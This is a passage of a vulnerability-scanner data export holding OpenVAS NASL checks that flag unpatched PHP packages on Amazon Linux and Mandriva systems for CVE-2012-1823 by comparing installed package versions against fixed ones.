rpm:\"php-mysqlnd~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:47", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2012-08-03T00:00:00", "id": "OPENVAS:1361412562310831624", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831624", "title": "Mandriva Update for php MDVSA-2012:068 (php)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for php MDVSA-2012:068 (php)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:068\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831624\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:55:23 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"MDVSA\", value:\"2012:068\");\n script_name(\"Mandriva Update for php MDVSA-2012:068 (php)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(2011\\.0|2010\\.1)\");\n script_tag(name:\"affected\", value:\"php on Mandriva Linux 2011.0,\n Mandriva Linux 2010.1\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"A vulnerability has been found and corrected in php(-cgi):\n\n PHP-CGI-based setups contain a vulnerability when parsing query string\n parameters from php files. A remote unauthenticated attacker could\n obtain sensitive information, cause a denial of service condition or\n may be able to execute arbitrary code with the privileges of the web\n server (CVE-2012-1823).\n\n The updated packages have been patched to correct this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-doc\", rpm:\"php-doc~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-enchant\", rpm:\"php-enchant~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fileinfo\", rpm:\"php-fileinfo~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fpm\", rpm:\"php-fpm~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-intl\", rpm:\"php-intl~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysqlnd\", rpm:\"php-mysqlnd~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-phar\", rpm:\"php-phar~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sqlite3\", rpm:\"php-sqlite3~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sybase_ct\", rpm:\"php-sybase_ct~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zip\", rpm:\"php-zip~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.3.11~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-doc\", rpm:\"php-doc~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-enchant\", rpm:\"php-enchant~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fileinfo\", rpm:\"php-fileinfo~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fpm\", rpm:\"php-fpm~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-intl\", rpm:\"php-intl~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysqlnd\", rpm:\"php-mysqlnd~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-phar\", rpm:\"php-phar~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sqlite3\", rpm:\"php-sqlite3~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sybase_ct\", rpm:\"php-sybase_ct~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.3.11~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 